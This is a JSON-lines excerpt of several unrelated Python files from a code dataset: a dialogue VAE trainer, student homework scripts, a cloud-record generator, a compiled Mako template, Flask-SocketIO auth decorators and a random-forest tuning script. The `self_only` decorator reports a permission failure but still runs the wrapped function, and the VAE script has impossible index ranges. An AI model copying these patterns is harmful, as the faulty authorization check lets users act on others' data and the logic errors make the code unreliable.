time.gmtime())\n\n # splits = ['train', 'val'] + (['test'] if args.test else [])\n splits = ['train'] + (['test'] if args.test else [])\n\n datasets_real = OrderedDict()\n datasets_fake = OrderedDict()\n for split in splits:\n with open(os.path.join(\"/home/raliegh/图片/ConvLab-2/convlab2/policy/mle/processed_data\",\n 'sa_element_{}_real.pkl'.format(split)), 'rb') as f:\n datasets_real[split] = pickle.load(f)\n # with open(os.path.join(\"/dockerdata/siyao/ft_local/ConvLab/convlab2/policy/mle/multiwoz/processed_data/\",\n # 'sa_element_{}_fake.pkl'.format(split)), 'rb') as f:\n # datasets_fake[split] = pickle.load(f)\n\n model = dialogue_VAE(\n max_sequence_length= 60,\n embedding_size= 549,\n rnn_type= \"gru\",\n hidden_size=args.hidden_size,\n word_dropout=args.word_dropout,\n embedding_dropout=args.embedding_dropout,\n latent_size=args.latent_size,\n num_layers=args.num_layers,\n bidirectional=args.bidirectional\n )\n\n model.to(device)\n # print(model)\n\n if args.tensorboard_logging:\n writer = SummaryWriter(os.path.join(args.logdir, expierment_name(args,ts)))\n writer.add_text(\"model\", str(model))\n writer.add_text(\"args\", str(args))\n writer.add_text(\"ts\", ts)\n\n save_model_path = os.path.join(args.save_model_path, ts)\n os.makedirs(save_model_path)\n\n def kl_anneal_function(anneal_function, step, k, x0):\n \"\"\"\n :param anneal_function:\n :param step:\n :param k:\n :param x0:\n :return:\n \"\"\"\n if anneal_function == 'logistic':\n return float(1/(1+np.exp(-k*(step-x0))))\n elif anneal_function == 'linear':\n return min(1, step/x0)\n\n # NLL = torch.nn.NLLLoss(size_average=False)\n # Reconstruction_loss = torch.nn.BCELoss(reduction=\"sum\")\n\n # def loss_fn(logp, target, length, mean, logv, anneal_function, step, k, x0):\n #\n # # cut-off unnecessary padding from target, and flatten\n # # target = target[:, :torch.max(length).item()].contiguous().view(-1)\n # # logp = logp.view(-1, logp.size(2))\n #\n # # Negative Log Likelihood\n # # NLL_loss = NLL(logp, target)\n # loss = reconstruction_loss(logp, target)\n #\n # # KL Divergence\n # KL_loss = -0.5 * torch.sum(1 + logv - mean.pow(2) - logv.exp())\n # KL_weight = kl_anneal_function(anneal_function, step, k, x0)\n #\n # return loss, KL_loss, KL_weight\n\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\n\n tensor = torch.cuda.FloatTensor if torch.cuda.is_available() else torch.Tensor\n step = 0\n # start from here.\n batch_id = 0\n for epoch in range(args.epochs):\n for split in splits:\n\n data_loader_real = datasets_real[split][split]\n # data_loader_fake = datasets_fake[split][split]\n tracker = defaultdict(tensor)\n\n # Enable/Disable Dropout\n if split == 'train':\n model.train()\n else:\n model.eval()\n\n temp = []\n discriminator_target = []\n for iteration, batch in enumerate(data_loader_real):\n if batch.size(1) >1:\n temp.append(batch)\n a_sys = batch[0][-1][340:549].clone()\n domain = [0] * 9\n for i in range(a_sys.shape[0]):\n if a_sys[i].item() == 1.:\n if 0 <= i <= 39:\n domain[0] = 1\n elif 40 <= i <= 58:\n domain[8] = 1\n elif 59 <= i <= 63:\n domain[1] = 1\n elif 64 <= i <= 110:\n domain[2] = 1\n elif 111 <= i <= 114:\n domain[3] = 1\n elif 115 <= i <= 109:\n domain[4] = 1\n elif 110 <= i <= 160:\n domain[5] = 1\n elif 170 <= i <= 204:\n domain[6] = 1\n elif 205 <= i <= 208:\n domain[7] = 1\n\n # temp.append(data_loader_fake[iteration])\n # discriminator_target.append(1)\n # discriminator_target.append(0)\n\n discriminator_target.append(domain)\n\n if (iteration+1) % (args.batch_size) == 0:\n batch_size = len(temp)\n # Forward path for VAE\n original_input, logp, disc_res = model(temp)\n # original_input, logp, mean, logv, z = model(temp, max_len)\n\n # loss calculation\n loss1, loss2 = loss_fn(logp, original_input.to(\"cuda\"), disc_res, torch.tensor(discriminator_target).float().to(\"cuda\"))\n loss = loss1 + loss2 * 2\n if (batch_id+1) % 1000 == 0:\n print(\"loss1 & 2:\",loss1.item()/batch_size, loss2.item()/batch_size)\n # NLL_loss, KL_loss, KL_weight = loss_fn(logp, original_input.to(\"cuda\"),\n # max_len, mean, logv, args.anneal_function, step, args.k, args.x0)\n #loss = (NLL_loss + KL_weight * KL_loss)\n\n # evluation stuff\n # backward + optimization\n if split == 'train':\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n step += 1\n\n # bookkeepeing\n tracker['ELBO'] = torch.cat((tracker['ELBO'], loss.detach().unsqueeze(0)))\n if split == \"test\":\n l1_loss = torch.sum(torch.abs((logp > 0.5).type(torch.FloatTensor) - original_input)).to(\"cuda\")\n tracker['l1_loss'] = torch.cat((tracker['l1_loss'], l1_loss.unsqueeze(0)))\n\n if args.tensorboard_logging and (batch_id+1) % args.print_every == 0:\n writer.add_scalar(\"%s/ELBO\"%split.upper(), loss.item()/batch_size, batch_id)\n # writer.add_scalar(\"%s/NLL Loss\"%split.upper(), NLL_loss.item()/batch_size, batch_id)\n # writer.add_scalar(\"%s/KL Loss\"%split.upper(), KL_loss.item()/batch_size, batch_id)\n # writer.add_scalar(\"%s/KL Weight\"%split.upper(), KL_weight, batch_id)\n\n # if (batchID+1) % args.print_every == 0: # or iteration+1 == len(data_loader):\n # print(\"%s Batch %04d/%i, Loss %9.4f, NLL-Loss %9.4f, KL-Loss %9.4f, KL-Weight %6.3f\"\n # %(split.upper(), batchID, len(data_loader)-1, loss.item()/batch_size, NLL_loss.item()/batch_size, KL_loss.item()/batch_size, KL_weight))\n\n # if split == 'valid':\n # if 'target_sents' not in tracker:\n # tracker['target_sents'] = list()\n #\n # tracker['target_sents'] += idx2word(batch['target'].tolist(), i2w=datasets['train'].get_i2w(), pad_idx=datasets['train'].pad_idx)\n # tracker['z'] = torch.cat((tracker['z'], z.data), dim=0)\n\n temp = []\n discriminator_target = []\n max_len = 0\n batch_id += 1\n\n total_len = 0\n for ele in temp:\n total_len += ele.size(1)\n print(\"evaluation: \", (torch.sum(original_input) / total_len).item(),\n (torch.sum(torch.abs((logp > 0).float() - original_input.to(\"cuda\"))) / total_len).item())\n\n print(\"%s Epoch %02d/%i, Mean ELBO %9.4f\"%(split.upper(), epoch, args.epochs, torch.mean(tracker['ELBO'])/args.batch_size ))\n\n if split == \"test\":\n print(\"test L1 loss: \",(torch.mean(tracker['l1_loss']) / args.batch_size).item())\n\n if args.tensorboard_logging:\n writer.add_scalar(\"%s-Epoch/ELBO\"%split.upper(), torch.mean(tracker['ELBO']), epoch)\n\n # save a dump of all sentences and the encoded latent space\n if split == 'valid':\n dump = {'target_sents':tracker['target_sents'], 'z':tracker['z'].tolist()}\n if not os.path.exists(os.path.join('dumps', ts)):\n os.makedirs('dumps/'+ts)\n with open(os.path.join('dumps/'+ts+'/valid_E%i.json'%epoch), 'w') as dump_file:\n json.dump(dump,dump_file)\n\n # save checkpoint\n if split == 'train' and (epoch+1) % 10 == 0:\n checkpoint_path = os.path.join(save_model_path, \"E%i.pytorch\"%(epoch))\n torch.save(model.state_dict(), checkpoint_path)\n print(\"Model saved at %s\"%checkpoint_path)\n\n save_path = \"./bin/\"\n torch.save(model.state_dict(), save_path + \"idea7_domain_tiny_data.pol.mdl\")\n\n\nif __name__ == '__main__':\n # args stuff\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_dir', type=str, default='data')\n parser.add_argument('--create_data', action='store_true')\n parser.add_argument('--max_sequence_length', type=int, default=60)\n parser.add_argument('--min_occ', type=int, default=1)\n parser.add_argument('--test', action='store_true')\n\n parser.add_argument('-ep', '--epochs', type=int, default=10)\n parser.add_argument('-bs', '--batch_size', type=int, default=32)\n parser.add_argument('-lr', '--learning_rate', type=float, default=0.001)\n\n parser.add_argument('-eb', '--embedding_size', type=int, default=549)\n parser.add_argument('-rnn', '--rnn_type', type=str, default='gru')\n parser.add_argument('-hs', '--hidden_size', type=int, default=512)\n parser.add_argument('-nl', '--num_layers', type=int, default=1)\n parser.add_argument('-bi', '--bidirectional', type=bool, default=True)\n parser.add_argument('-ls', '--latent_size', type=int, default=256)\n parser.add_argument('-wd', '--word_dropout', type=float, default=1)\n parser.add_argument('-ed', '--embedding_dropout', type=float, default=1)\n\n parser.add_argument('-af', '--anneal_function', type=str, default='logistic')\n parser.add_argument('-k', '--k', type=float, default=0.0025)\n parser.add_argument('-x0', '--x0', type=int, default=2500)\n\n parser.add_argument('-v', '--print_every', type=int, default=20)\n parser.add_argument('-tb', '--tensorboard_logging', action='store_true')\n parser.add_argument('-log', '--logdir', type=str, default='logs')\n parser.add_argument('-bin', '--save_model_path', type=str, default='bin')\n\n args_idea5 = parser.parse_args()\n\n args_idea5.rnn_type = args_idea5.rnn_type.lower()\n args_idea5.anneal_function = args_idea5.anneal_function.lower()\n\n assert args_idea5.rnn_type in ['rnn', 'lstm', 'gru']\n assert args_idea5.anneal_function in ['logistic', 'linear']\n assert 0 <= args_idea5.word_dropout <= 1\n from utils import expierment_name\n from convlab2.policy.mle.idea5.model_dialogue import dialogue_VAE\n main(args_idea5)\n","sub_path":"convlab2/policy/mle/idea5/train_dialogue.py","file_name":"train_dialogue.py","file_ext":"py","file_size_in_byte":12827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"215841714","text":"import csv\nimport sys\n\ndef csv_to_list(file_name):\n# Reads the contents of a CSV into a a list whose elements are lists, mimicking the structure of the CSV contents.\n file = open(file_name)\n list = [[item.strip() for item in line.split(',')] for line in file.readlines()]\n file.close()\n return list\n\ndef transpose_list(original_list):\n# Transposes a given list object and returns a transposed version of that list.\n return map(list,zip(*original_list))\n\ndef main():\n\n i = sys.argv[1]\n d = transpose_list(csv_to_list(i))\n o = open(i.split('.')[0]+'_transposed.csv','w')\n w = csv.writer(o)\n w.writerows(d)\n\nif __name__ == '__main__':\n main()\n","sub_path":"transpose.py","file_name":"transpose.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"19227001","text":"#!/usr/bin/env python2.7-32\n# Arpin_P_204B_Sec1_HW4.py\n# Lance Thompson\n# Physics 204B 04\n# 3/25/2015\n\nfrom visual import *\nfrom visual.graph import *\n\nk, q, d = 8.99e9, 1.602e-19, 0.2e-9\n\noscillation = gdisplay(xtitle='Time', ytitle='Response (click and drag mouse to see coordinates)')\nfunct1 = gcurve(color=color.cyan)\nfunct2 = gcurve(delta=0.5, color=color.red)\nfunct3 = gcurve(color=color.yellow)\n\nfor t in arange(0.2e-9, 0.7e-9, 1e-11):\n funct1.plot(pos=(t, (2 * k * q * d) / ((t ** 3) * ((1 - ((d / (2 * t)) ** 2)) ** 2))))\n funct2.plot(pos=(t, (2 * k * q * d) / (t ** 3)))\n funct3.plot(pos=(t, (2 * k * q * d) / (t ** 3) + ((k * q * (d ** 3)) / (t ** 5))))\n\nprint(\"1. Lance Thompson\")\nprint(\"3 . The equation was good the value of d of the red one is invalid at 3.491e-10.\\n 4.The yellow one is invalid\"\n \"around 2.6943-10. The criteria for a good result is when the lines are pretty much on top of each other.\\n\"\n \"This assignment took about 12 minutes.\")\n\n","sub_path":"p4/p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"513383475","text":"def main():\n avg = 0\n inti = 1\n input_file = open('numbers.txt', 'r')\n record = input_file.readline()\n record = record.rstrip('\\n')\n print('#' + str(inti), record)\n while record != \"\":\n record = input_file.readline()\n record = record.rstrip('\\n')\n inti += 1\n if record != \"\":\n print('#' + str(inti), record)\n avg += int(record)\n if record == \"\":\n print(\"The average of all the numbers is: \" + '{:.2f}'.format(avg / (inti - 1)))\n input_file.close()\n\n\nmain()\n","sub_path":"6.2/6.2.py","file_name":"6.2.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"134038640","text":"import argparse\nimport datetime\nimport cloud_data_types\nimport xml_operations\nimport data_structures\nimport logging\nimport random\nfrom math import floor, ceil\nfrom generator import Generator\n\nparser = argparse.ArgumentParser(description=\"MAD Generator, simulator of Cloud life.\")\n\nparser.add_argument(\n \"--output-type\",\n choices=[\"opennebulaxml\", \"records\"],\n required=True,\n help=\"Output type of MAD Generator. opennebulaxml (OpenNebula XML) or records\",\n)\n\nparser.add_argument(\n \"--count\",\n type=int,\n required=True,\n help=\"The number of events to generate\"\n)\n\nparser.add_argument(\n \"--start-time\",\n type=datetime.datetime.fromisoformat,\n default=datetime.datetime.today() - datetime.timedelta(days=100),\n help=\"First TimeStamp of whole simulation - format YYYY-MM-DD\",\n)\n\nparser.add_argument(\n \"--max-objects\",\n type=int,\n required=True,\n help=\"Max number of available existing objects\",\n)\n\n\nparser.add_argument(\n \"--average-occupancy\",\n type=int,\n default=50,\n help=\"The percentage number of objects out of the maximum, which should exist on average\",\n)\n\nparser.add_argument(\n \"--records-per-file\",\n type=int,\n default=500,\n help=\"Number of records to be stored per file. Default=500\",\n)\n\nparser.add_argument(\n '--cron-interval',\n type=int,\n default=60*60*24,\n help='Intreval of \"cron-triggered\" events'\n)\n\nparser.add_argument(\n \"--users-count\", type=int, default=20, help=\"Users using simulated cloud\"\n)\n\nparser.add_argument(\n \"--groups-count\", type=int, default=7, help=\"Groups in simulated cloud\"\n)\n\nparser.add_argument(\n \"--cloud-name\", type=str, default=\"MADCLOUD\", help=\"name of the cloud\"\n) # SiteName/CloudType/CloudComputeService\n\n\nparser.add_argument(\n \"--mode\",\n choices=[\"vm\", \"network\", \"storage\"],\n required=True,\n help=\"In which mode will MAD Generator run\",\n)\n\nparser.add_argument(\n \"-f\", \"--flood\", action=\"store_true\", default=False, help=\"Flood mode\"\n)\n\nparser.add_argument(\n \"-d\",\n \"--debug\",\n action=\"store_false\",\n default=True,\n help=\"Enable debug mode with logs\",\n)\n\nCONF = parser.parse_args()\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"%(asctime)s - %(filename)s:%(lineno)d - #%(process)d %(levelname)s: %(message)s\",\n)\nif CONF.debug:\n logging.disable(logging.CRITICAL)\n\nlogging.debug(\"Arguments parsed:\")\nlogging.debug(CONF)\n\n\nif CONF.output_type == \"opennebulaxml\":\n xml_operator = xml_operations.XmlOperator()\n cloud_datastores = data_structures.Datastores()\n\n for x in range(CONF.users_count):\n\n user = cloud_data_types.User(CONF)\n print(user.uname)\n xml_operator.output(user)\n\n # flood means generating all types of outputs i.e. image, cluster, host, vm\n if CONF.flood:\n\n for x in range(random.randint(1, CONF.max_objects)):\n\n vm = cloud_data_types.Vm(CONF)\n\n vm.uname = cloud_data_types.User.users_dict[vm.uid][\"uname\"]\n vm.gid = cloud_data_types.User.users_dict[vm.uid][\"gid\"]\n vm.gname = cloud_data_types.User.users_dict[vm.uid][\"gname\"]\n\n xml_operator.output(vm)\n\n for z in range(10):\n\n image = cloud_data_types.Image(CONF)\n\n image.uname = cloud_data_types.User.users_dict[image.uid][\"uname\"]\n image.gid = cloud_data_types.User.users_dict[image.uid][\"gid\"]\n image.gname = cloud_data_types.User.users_dict[image.uid][\"gname\"]\n\n datastore = cloud_datastores.getNewDatastore()\n\n image.datastore_id = datastore[\"datastore_id\"]\n image.datastore = datastore[\"datastore\"]\n\n xml_operator.output(image)\n\n for z in range(10):\n\n host = cloud_data_types.Host()\n\n xml_operator.output(host)\n\n for z in range(10):\n\n cluster = cloud_data_types.Cluster()\n\n xml_operator.output(cluster)\nelse:\n gen = Generator(datetime.datetime.timestamp(CONF.start_time),\n CONF.cron_interval,\n CONF.count,\n CONF.users_count,\n int(floor((0.8 * CONF.average_occupancy / 100) * CONF.max_objects / CONF.users_count)),\n int(ceil((1.2 * CONF.average_occupancy / 100) * CONF.max_objects / CONF.users_count)),\n CONF.groups_count,\n CONF.cloud_name,\n CONF.records_per_file)\n\n if CONF.flood:\n logging.debug(\"FLOOD in record mode\")\n gen.generate_cloud_records()\n gen.generate_ip_records()\n gen.generate_storage_records()\n else:\n if CONF.mode == \"vm\":\n logging.debug(\"Generating VM records\")\n gen.generate_cloud_records()\n if CONF.mode == \"storage\":\n logging.debug(\"Generating Storage records\")\n gen.generate_storage_records()\n if CONF.mode == \"network\":\n logging.debug(\"Generating Network records\")\n gen.generate_ip_records()\n\n","sub_path":"mad.py","file_name":"mad.py","file_ext":"py","file_size_in_byte":4987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"290103495","text":"# -*- coding:ascii -*-\nfrom mako import runtime, filters, cache\nUNDEFINED = runtime.UNDEFINED\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 10\n_modified_time = 1422405386.993231\n_enable_loop = True\n_template_filename = '/Users/John/DevProjects/chef/homepage/templates/viewEvent.html'\n_template_uri = 'viewEvent.html'\n_source_encoding = 'ascii'\nimport os, os.path, re\n_exports = ['content', 'navbar_links', 'tab_title', 'paper_elements_import', 'footer_links']\n\n\ndef _mako_get_namespace(context, name):\n try:\n return context.namespaces[(__name__, name)]\n except KeyError:\n _mako_generate_namespaces(context)\n return context.namespaces[(__name__, name)]\ndef _mako_generate_namespaces(context):\n pass\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, '/base_app/templates/base.htm', _template_uri)\ndef render_body(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n def content():\n return render_content(context._locals(__M_locals))\n def footer_links():\n return render_footer_links(context._locals(__M_locals))\n def tab_title():\n return render_tab_title(context._locals(__M_locals))\n def paper_elements_import():\n return render_paper_elements_import(context._locals(__M_locals))\n def navbar_links():\n return render_navbar_links(context._locals(__M_locals))\n __M_writer = context.writer()\n __M_writer('\\n\\n')\n __M_writer('\\n\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'tab_title'):\n context['self'].tab_title(**pageargs)\n \n\n __M_writer('\\n\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'paper_elements_import'):\n context['self'].paper_elements_import(**pageargs)\n \n\n __M_writer('\\n\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'navbar_links'):\n context['self'].navbar_links(**pageargs)\n \n\n __M_writer('\\n\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'content'):\n context['self'].content(**pageargs)\n \n\n __M_writer('\\n\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'footer_links'):\n context['self'].footer_links(**pageargs)\n \n\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_content(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n def content():\n return render_content(context)\n __M_writer = context.writer()\n __M_writer('\\n\\n\\t
\\n\\t\\t

Event Information

\\n\\t
\\n\\n')\n __M_writer('\\t
\\n\\n')\n __M_writer('\\t
\\n')\n __M_writer('\\t\\t\\n\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\n')\n __M_writer('\\n\\t\\t\\t

Venue Information

\\n\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t \\n\\t\\t\\t \\n\\t\\t\\t TX\\n\\t\\t\\t TX\\n\\t\\t\\t TX\\n\\t\\t\\t \\n\\t\\t\\t \\n\\t\\t\\t\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\n')\n __M_writer('\\n\\t\\t\\n')\n __M_writer('\\t\\t\\t\\n\\t
\\n')\n __M_writer('\\n')\n __M_writer('\\t
\\n\\n\\t \\t

Related Actions

\\n\\n')\n __M_writer('\\t\\tUpload Map\\n')\n __M_writer('\\n')\n __M_writer('\\t\\tView Related Areas\\n')\n __M_writer('\\n')\n __M_writer('\\t\\tView Map\\n')\n __M_writer('\\n')\n __M_writer('\\t\\tView Items for Sale\\n')\n __M_writer('\\n')\n __M_writer('\\t\\tCancel Event\\n')\n __M_writer('\\n\\t
\\n')\n __M_writer('\\n\\t
\\n')\n __M_writer('\\n\\t
\\n\\t
\\n\\t
\\n\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_navbar_links(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n def navbar_links():\n return render_navbar_links(context)\n __M_writer = context.writer()\n __M_writer('\\n \\t\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_tab_title(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n def tab_title():\n return render_tab_title(context)\n __M_writer = context.writer()\n __M_writer('\\n Event Information\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_paper_elements_import(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n def paper_elements_import():\n return render_paper_elements_import(context)\n __M_writer = context.writer()\n __M_writer('\\n\\t\\n\\t\\n\\t\\n\\t\\n\\t\\n\\t\\n\\t\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_footer_links(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n def footer_links():\n return render_footer_links(context)\n __M_writer = context.writer()\n __M_writer('\\n')\n __M_writer('\\t
\\n\\n')\n __M_writer('\\t\\t
\\n\\t\\t \\t

Users

\\n\\t \\t\\t\\n\\t\\t
\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t
\\n\\t\\t \\t

Items

\\n\\t\\t \\t\\n\\t\\t
\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t
\\n\\t\\t \\t

Events

\\n\\t\\t \\t\\n\\t\\t
\\n')\n __M_writer('\\n\\t
\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n\"\"\"\n__M_BEGIN_METADATA\n{\"line_map\": {\"128\": 25, \"192\": 186, \"134\": 11, \"140\": 11, \"146\": 15, \"153\": 15, \"154\": 16, \"27\": 0, \"156\": 17, \"157\": 17, \"158\": 18, \"159\": 18, \"160\": 19, \"161\": 19, \"162\": 20, \"155\": 16, \"164\": 21, \"163\": 20, \"166\": 22, \"167\": 22, \"43\": 7, \"44\": 9, \"173\": 154, \"49\": 13, \"179\": 154, \"180\": 156, \"181\": 159, \"54\": 23, \"183\": 169, \"184\": 179, \"185\": 181, \"186\": 191, \"59\": 33, \"64\": 152, \"182\": 167, \"74\": 35, \"80\": 35, \"81\": 42, \"82\": 45, \"83\": 47, \"84\": 50, \"85\": 54, \"86\": 56, \"87\": 60, \"88\": 62, \"89\": 66, \"90\": 68, \"91\": 72, \"92\": 76, \"93\": 80, \"94\": 82, \"95\": 86, \"96\": 88, \"97\": 92, \"98\": 94, \"99\": 104, \"100\": 106, \"101\": 110, \"102\": 113, \"103\": 116, \"104\": 118, \"105\": 123, \"106\": 125, \"107\": 127, \"108\": 129, \"109\": 131, \"110\": 133, \"111\": 135, \"112\": 137, \"113\": 139, \"114\": 141, \"115\": 144, \"116\": 147, \"122\": 25, \"165\": 21}, \"source_encoding\": \"ascii\", \"uri\": \"viewEvent.html\", \"filename\": \"/Users/John/DevProjects/chef/homepage/templates/viewEvent.html\"}\n__M_END_METADATA\n\"\"\"\n","sub_path":"homepage/cached_templates/templates/viewEvent.html.py","file_name":"viewEvent.html.py","file_ext":"py","file_size_in_byte":10845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"470062639","text":"\"\"\"\ndistribution.py\nAuthor: Andy\nCredit: Milo the Almighty Savior of All Existence\n\nAssignment:\n\nWrite and submit a Python program (distribution.py) that computes and displays \nthe distribution of characters in a given sample of text.\n\nOutput of your program should look like this:\n\nPlease enter a string of text (the bigger the better): The rain in Spain stays mainly in the plain.\nThe distribution of characters in \"The rain in Spain stays mainly in the plain.\" is:\niiiiii\nnnnnnn\naaaaa\nsss\nttt\nee\nhh\nll\npp\nyy\nm\nr\n\nNotice about this example:\n\n* The text: 'The rain ... plain' is provided by the user as input to your program.\n* Uppercase characters are converted to lowercase\n* Spaces and punctuation marks are ignored completely.\n* Characters that are more common appear first in the list.\n* Where the same number of characters occur, the lines are ordered alphabetically. \n For example, in the printout above, the letters e, h, l, p and y both occur twice \n in the text and they are listed in the output in alphabetical order.\n* Letters that do not occur in the text are not listed in the output at all.\n\"\"\"\nalphabet = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\"]\nstrin = input(\"Please enter a string of text (the bigger the better): \")\nprint ('The distribution of characters in \"' + strin + '\" is: ')\nstrin = strin.lower()\nstrlist=list(strin)\nfor j in range(10):\n for x in strlist:\n if x not in alphabet:\n strlist.remove(x)\n \nstrlen=len(strlist)\nfinal=[]\nfor a in alphabet:\n letterstrin = \"\"\n for j in range(10):\n if a in strlist:\n letterstrin = letterstrin + a\n strlist.remove(a)\n final.append(letterstrin)\n \n\nnewfinal = []\nfor a in final:\n for b in alphabet:\n if b in a:\n newfinal.append(a)\n \nfor b in range(100):\n gofor = 0\n gofor1 = 1\n while gofor < (len(newfinal)-1):\n x = \"\"\n if len(newfinal[gofor]) < len(newfinal[gofor1]):\n x = newfinal[gofor]\n newfinal[gofor] = newfinal[gofor1]\n newfinal[gofor1] = x\n gofor = gofor + 1\n gofor1 = gofor1 + 1\n\nfor i in range(len(newfinal)):\n print (str(newfinal[i]))\n\n\n","sub_path":"distribution.py","file_name":"distribution.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"630106999","text":"import functools\nimport inspect\nfrom flask_login import current_user\nfrom flask_socketio import disconnect, emit\nfrom ...services import user, diagram, project_permission\n\n\ndef _get_project_id(**kwargs):\n try:\n project_id = None\n if 'project_id' in kwargs:\n project_id = int(kwargs['project_id'])\n else:\n if 'diagram_id' in kwargs:\n project_id = diagram.get_diagram(int(kwargs['diagram_id'])).project_id\n elif 'project_permission_id' in kwargs:\n project_id = project_permission.get_project_permission(\n int(kwargs['project_permission_id'])).project_id\n except (TypeError, diagram.DiagramDoesNotExist,\n project_permission.ProjectPermissionDoesNotExist):\n return None\n else:\n return project_id\n\n\ndef self_only(message):\n def decorator(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n user_identity = current_user.username\n if user_identity != args[0]:\n emit(message, {\n 'type': 'Failure',\n 'failure': 'PermissionDenied',\n 'message': 'Not permission to this user'\n })\n return func(*args, **kwargs)\n\n return wrapper\n\n return decorator\n\n\ndef check_user_project_permission(message, min_permission):\n def decorator(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n\n args_name = list(inspect.signature(func).parameters.keys())\n project_id = _get_project_id(**{args_name[0]: args[0]})\n\n if project_id is None:\n emit(message, {\n 'type': 'Failure',\n 'failure': 'ProjectDoesNotExist',\n 'message': 'project with this id does not exist'\n })\n return\n\n have_permission = user.user_have_permission_for_project(\n username=current_user.username,\n project_id=project_id,\n min_permission=min_permission)\n\n if not have_permission:\n emit(message, {\n 'type': 'Failure',\n 'failure': 'PermissionDenied',\n 'message': 'Not permission to this project'\n })\n else:\n return func(*args, **kwargs)\n return wrapper\n return decorator\n\n\ndef authenticated_only(func):\n @functools.wraps(func)\n def wrapped(*args, **kwargs):\n if not current_user.is_authenticated:\n disconnect()\n else:\n return func(*args, **kwargs)\n return wrapped\n","sub_path":"abovo/main/utils/event_decorators/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"69679134","text":"import pandas as pd\nimport numpy as np\nimport pickle\nimport time\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\n\n\ndf = np.array(pd.read_pickle('../data/diabetes_train.pickle'))\n\nX = df[:, 0:-1]\nY = df[:, -1]\n\nopt_depth = -1\nopt_n_estimator = -1\nopt_score = -1\ntransformed_X = np.array([])\nconfig = []\n\nfor depth in range(1, 21):\n dt = DecisionTreeClassifier(max_depth=depth)\n dt.fit(X, Y)\n\n model = SelectFromModel(dt, prefit=True)\n X_new = model.transform(X)\n\n for n in range(50, 501, 50):\n print('computing max depth = %d, number of estimators = %d' % (depth, n))\n clf = RandomForestClassifier(max_depth=depth, n_estimators=n)\n start = time.clock()\n result = cross_val_score(clf, X_new, Y, cv=5)\n end = time.clock()\n duration = end - start\n mean_accuracy = np.mean(result)\n\n config.append({'max_depth': depth, 'n_estimator': n, 'mean_accuracy': mean_accuracy, 'duration': duration})\n\n if mean_accuracy > opt_score:\n opt_score = mean_accuracy\n opt_depth = depth\n opt_n_estimator = n\n transformed_X = 